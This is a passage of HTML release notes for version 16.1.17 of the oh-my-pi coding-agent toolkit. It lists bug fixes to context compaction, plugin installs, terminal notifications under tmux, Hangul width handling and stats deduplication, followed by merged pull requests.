<li>Fixed marketplace plugin installs registering only in <code>installed_plugins.json</code> and never in the runtime plugin tree, leaving slash commands and extensions unavailable after <code>omp plugin install name@marketplace</code>. The runtime loader now also enumerates the project-scope plugins root (<code>&lt;projectAnchor&gt;/.omp/plugins</code>) so <code>--scope project</code> installs surface alongside user-scope installs, with project entries shadowing same-named user entries (<a href="https://github.com/can1357/oh-my-pi/issues/3244" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3244/hovercard">#3244</a>).</li>
<li>Fixed <code>umans</code> requests with more than 10 live context images still sending every image despite the provider budget; outgoing provider contexts now drop the oldest images above the active provider cap while preserving text and newest images (<a href="https://github.com/can1357/oh-my-pi/issues/3230" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3230/hovercard">#3230</a>).</li>
<li>Fixed snapcompact auto-compaction looping the "snapcompact could not bring the context under the limit — using an LLM summary instead" warning on every threshold tick for sub-1M-token models (Claude Sonnet 4.5, GPT-5.x, Gemini 2.x). <code>snapcompact.compact()</code> was called with no <code>maxFrames</code> override, so it defaulted to <code>MAX_FRAMES_DEFAULT = 80</code>; the projection in <code>AgentSession</code> charges <code>FRAME_TOKEN_ESTIMATE = 5024</code> per frame block (the conservative high-res Anthropic ceiling), making 80 × 5024 ≈ 402k frame-token projections that always overflow a 200k budget. <code>AgentSession.#computeSnapcompactMaxFrames</code> now sizes the <code>maxFrames</code> cap from a <strong>shape-aware</strong> reserve — <code>2 × geometry(shape).capacity</code> worth of verbatim text-edge chars billed at the tiktoken cl100k 4-chars/token baseline (with a 1.15 multiplier for tokenizer drift), plus a 2k summary-template allowance — mirroring what <code>#projectSnapcompactContextTokens</code> will charge once frames land. The shape comes from the same <code>snapcompact.resolveShape(model, settings)</code> call the auto and manual paths pass into <code>snapcompact.compact()</code>. The cap reserve applies <strong>only</strong> to the frame-cap math, not the skip decision: snapcompact is skipped outright only when <code>kept-recent + non-message ≥ ctxWindow − reserve</code> (no headroom at all), so the frame-less <code>text.length &lt;= 2 * edgeCap</code> short-circuit in <code>planArchive</code> can still land a valid text-only archive when residual headroom is positive but below the cap reserve. The projection guard catches any actual frame-bearing archive that overflows. (<a href="https://github.com/can1357/oh-my-pi/issues/3247" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3247/hovercard">#3247</a>)</li>
<li>Fixed large-session TUI stalls by tailing appended transcript JSONL and collapsing compacted history on the live display surface (<a href="https://github.com/can1357/oh-my-pi/issues/3258" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3258/hovercard">#3258</a>).</li>
<li>Fixed status-line <code>usage</code> segment ignoring Codex subscription limits that carry a <code>scope.tier</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2877" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2877/hovercard">#2877</a>).</li>
<li>Fixed extension <code>tool_call</code>/<code>tool_result</code> events for hashline <code>edit</code> calls to expose <code>event.input.path</code> for single-file edits and <code>event.input.paths</code> for every parsed target, so planning-mode gates can allow one markdown plan edit but still block multi-file hashline calls that cannot be represented by one path (<a href="https://github.com/can1357/oh-my-pi/issues/1678" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1678/hovercard">#1678</a>).</li>
<li>Fixed scripted <code>eval</code> <code>agent()</code> subagents continuing after a successful <code>yield</code> when a trailing empty assistant <code>stop</code> arrived after the executor's yield-triggered abort. The session's <code>agent_end</code> maintenance compared <code>#assistantEndedWithSuccessfulYield(msg)</code> against the trailing empty-stop message — not the prior yield-bearing one — so the empty-stop recovery path appended a retry reminder and scheduled <code>agent.continue()</code>, reviving the already-yielded child. The yield handler now sets a sticky <code>#yieldTerminationPending</code> flag (cleared on the next <code>prompt()</code>) that short-circuits empty-stop / unexpected-stop / compaction continuations for the rest of the run, so a successful yield is terminal regardless of trailing stops (<a href="https://github.com/can1357/oh-my-pi/issues/3389" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3389/hovercard">#3389</a>).</li>
<li>Fixed snapcompact rasterizing transcript frames into requests bound for GitHub Copilot business and enterprise endpoints, which then rejected the session permanently with <code>400 vision is not supported</code>. The snapcompact vision gate now also short-circuits whenever <code>model.provider === "github-copilot"</code> and the resolved <code>baseUrl</code> is not the canonical personal-Copilot host, protecting cached/stale Model specs that still advertise <code>["text","image"]</code> on a non-personal endpoint. (<a href="https://github.com/can1357/oh-my-pi/issues/3387" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3387/hovercard">#3387</a>)</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>remember(..., { extract: true })</code> fact/entity extraction accepting an <code>extractText</code> override so hosts can store full transcripts while mining facts from a safer projection; also tightened deterministic <code>Instruction:</code> extraction to require an explicit <code>I</code>/<code>you</code> subject instead of treating every <code>always</code>/<code>never</code> clause as a user instruction. (<a href="https://github.com/can1357/oh-my-pi/issues/3372" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3372/hovercard">#3372</a>)</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Added</h3>
<ul>
<li>Added <code>setHangulCompatJamoWidthOverride(value)</code> to override the Hangul Compatibility Jamo (U+3131..U+318E) display width at runtime via a process-global atomic, instead of relying solely on the compile-time <code>cfg!(target_os = "macos")</code> heuristic. The actual width is decided by the client terminal (not the host OS), so the TUI resolves it from the terminal identity and pushes the result here. Encoding: <code>0</code> = platform default (macOS narrow, otherwise UAX#11), <code>1</code> = narrow (1 cell), <code>2</code> = wide (2 cells), <code>3</code> = Unicode width (no correction). The leaf width helpers read this override, so no width/slice/truncate/wrap signatures change.</li>
</ul>
<h2>@oh-my-pi/omp-stats</h2>
<h3>Fixed</h3>
<ul>
<li>Stats sync counted the same provider request multiple times when a forked or branched session file copied the parent's entries verbatim. Inserts now skip rows whose <code>(entry_id, timestamp)</code> already exists under a different <code>session_file</code>, and a one-shot migration on the next <code>omp stats</code> run collapses any pre-existing duplicates (<a href="https://github.com/can1357/oh-my-pi/issues/3370" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3370/hovercard">#3370</a>).</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added runtime resolution of the Hangul Compatibility Jamo (U+3131..U+318E) display width for terminals known to disagree with the platform default (e.g. Ghostty, which renders these at 2 cells). Fixes doubled/ghosted jamo during Korean IME composition; the resolved width is pushed into the native width engine before the first paint. Other terminals keep the platform default (macOS narrow, otherwise UAX#11), so the override is a no-op outside Ghostty. A runtime DSR/CPR probe for unknown terminals is tracked separately.</li>
<li>Added <code>setHangulCompatibilityJamoWidth</code> / <code>getHangulCompatibilityJamoWidth</code> to set the jamo width profile (<code>"platform" | "unicode" | 1 | 2</code>); the profile is mirrored into the native <code>setHangulCompatJamoWidthOverride</code>.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Removed the 30-second OSC 11 background-color poll that ran on terminals without DEC Mode 2031 support (macOS Terminal.app, Warp, VS Code's built-in terminal, older Alacritty/WezTerm). Each poll's OSC 11 + DA1 write wiped the user's active text selection on several of those terminals, causing intermittent "can't copy" failures whenever a poll fired mid-drag — most visibly during the Ask tool dialog when the user wants to quote text back from the conversation (<a href="https://github.com/can1357/oh-my-pi/issues/3297" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3297/hovercard">#3297</a>). Theme detection now relies on the initial startup probe plus Mode 2031 push notifications; affected terminals pick up OS-theme changes on next launch.</li>
<li>Fixed <code>@</code>-path autocomplete failing on Windows for paths outside the cwd. Windows absolute paths (e.g. <code>C:\\Users\\...</code>) were not detected as absolute — only <code>/</code> was checked — so they were incorrectly joined with the base directory, producing invalid search paths and empty suggestions. Path-join calls also introduced backslashes into suggestion values, breaking round-trip insertion. Absolute path detection now uses <code>path.isAbsolute()</code> (handles drive letters) and suggestion paths are normalized to forward slashes (valid on all platforms).</li>
<li>Fixed settings rows crashing native text truncation when a malformed config value reaches the renderer as a non-string (<a href="https://github.com/can1357/oh-my-pi/issues/3338" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3338/hovercard">#3338</a>).</li>
<li>Fixed desktop notifications being silently lost under tmux on the common stack of tmux + kitty/ghostty/wezterm/iTerm2. <code>TERMINAL_ID</code> resolves to the inner terminal (whose markers leak into the tmux session env), which maps to <code>NotifyProtocol.Osc9</code> / <code>NotifyProtocol.Osc99</code>, and <code>sendNotification()</code> wrote that raw OSC straight to stdout — tmux dropped it on the floor and <code>monitor-bell</code> / <code>monitor-activity</code> never fired, so a backgrounded omp pane had no way to flag completion or <code>ask</code> blockage. Under <code>TMUX</code>, OSC-protocol notifications are now wrapped in tmux's <code>\x1bPtmux;…\x1b\\</code> DCS passthrough envelope (so users with <code>set -g allow-passthrough on</code> still get the real toast on the outer terminal) and followed by a <code>\x07</code> BEL (so <code>set -g monitor-bell on</code> reliably flags the window otherwise). The OSC 99 capability probe in <code>terminal.ts</code> is wrapped the same way so rich notifications keep working across tmux. <code>NotifyProtocol.Bell</code> paths are unchanged. (<a href="https://github.com/can1357/oh-my-pi/issues/3395" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3395/hovercard">#3395</a>)</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(coding-agent): handled <code>&lt;bunfs-root&gt;/&lt;binary&gt;</code> in __computeBunfsPackageRoot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4727451927" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3330" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3330/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3330">#3330</a></li>
<li>fix(mcp): omit unused optional tool args by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724931350" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3304" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3304/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3304">#3304</a></li>
<li>fix(task): treat maxConcurrency 0 as unbounded in spawn semaphore by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4724988039" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3307" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3307/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3307">#3307</a></li>
<li>fix(providers): honor llama.cpp per-model context windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4725795113" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3311" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3311/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3311">#3311</a></li>
<li>fix(tui): deliver notifications under tmux via DCS passthrough + BEL fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4737277542" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3396" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3396/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3396">#3396</a></li>
<li>fix(tui): runtime Hangul Compatibility Jamo width override + Ghostty detection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ZergRocks/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ZergRocks">@ZergRocks</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582051803" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1800" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1800/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1800">#1800</a></li>
<li>fix(catalog): restore Umans GLM-5.2 max reasoning by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4710426433" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3193" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3193/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3193">#3193</a></li>
<li>fix(agent): clamp provider context images by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4713879562" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3232" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3232/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3232">#3232</a></li>
<li>fix(cli): register marketplace plugin installs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4714884175" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3245" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3245/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3245">#3245</a></li>
<li>fix(agent): size snapcompact maxFrames by the live model window by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4715541246" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3249" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3249/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3249">#3249</a></li>
<li>fix(tui): reduce large transcript stalls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4716377651" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3259" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3259/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3259">#3259</a></li>
<li>fix(tui): include tiered Codex usage limits by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/riverpilot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/riverpilot">@riverpilot</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721837079" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3289" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3289/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3289">#3289</a></li>
<li>fix(cli): keep tiny-model downloads alive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721879295" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3292" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3292/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3292">#3292</a></li>
<li>fix(usage): dedup provider-wide notes and add report-level notes field by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726234349" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3312" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3312/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3312">#3312</a></li>
<li>fix(welcome): replace stale ? shortcut with /hotkeys in tips panel by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4726458520" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3315" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3315/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3315">#3315</a></li>
<li>fix(tui): stop OSC 11 poll from wiping text selection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728748344" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3344" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3344/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3344">#3344</a></li>
<li>fix(tui): @-path autocomplete on Windows for paths outside cwd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728809733" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3345" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3345/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3345">#3345</a></li>
<li>fix(cli): profile-alias installer produces correct paths for POSIX shells on Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728902013" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3346" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3346/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3346">#3346</a></li>
<li>fix: store slash commands in input history by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729574543" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3352" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3352/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3352">#3352</a></li>
<li>fix(tui): theme-aware welcome tip line for light-theme legibility by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735382484" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3376" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3376/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3376">#3376</a></li>
<li>fix(settings): prevent numeric config values from crashing settings UI by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735458942" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3377" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3377/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3377">#3377</a></li>
<li>fix(tools): stream tool downloads without Bun.write Response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735597315" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3379" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3379/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3379">#3379</a></li>
<li>fix(coding-agent): clamp auto thinking to undefined for models without controllable effort by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735598995" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3380" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3380/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3380">#3380</a></li>
<li>fix(coding-agent): honor app.message.followUp chord in ask prompt-style editor by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735599275" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3381" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3381/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3381">#3381</a></li>
<li>fix(stats): dedupe forked-session entries to stop double-counting by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735616453" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3382" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3382/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3382">#3382</a></li>
<li>fix(memory): scope mnemopi entity extraction to user turns by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735668029" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3383" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3383/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3383">#3383</a></li>
<li>fix(tui): attach pasted file paths as local refs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735671604" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3384" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3384/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3384">#3384</a></li>
<li>fix(coding-agent): restore TUI focus to live editor-slot owner when a fullscreen overlay closes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735691495" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3385" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3385/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3385">#3385</a></li>
<li>fix(catalog,coding-agent): disable vision on non-personal Copilot endpoints (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736520339" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3387" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3387/hovercard" href="https://github.com/can1357/oh-my-pi/issues/3387">#3387</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736626781" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3388" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3388/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3388">#3388</a></li>
<li>fix(session): suppress empty-stop retry after successful yield by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736900317" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3390" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3390/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3390">#3390</a></li>
<li>fix(ai/anthropic): honor caller-supplied Authorization/X-Api-Key for custom proxies (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736906280" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3391" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/3391/hovercard" href="https://github.com/can1357/oh-my-pi/issues/3391">#3391</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736976378" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3393" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3393/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3393">#3393</a></li>
<li>fix(ai/ollama): clamp num_predict at the Ollama Cloud 65536 cap by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4737031173" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3394" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3394/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3394">#3394</a></li>
<li>fix(providers): strip OpenRouter Anthropic reasoning replay by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4737583588" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/3400" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/3400/hovercard" href="https://github.com/can1357/oh-my-pi/pull/3400">#3400</a></li>
<li>fix(coding-agent): expose hashline edit path to extensions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4567862708" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1681" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1681/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1681">#1681</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.1.16...v16.1.17"><tt>v16.1.16...v16.1.17</tt></a></p>]]></content:encoded>
</item>
<item>
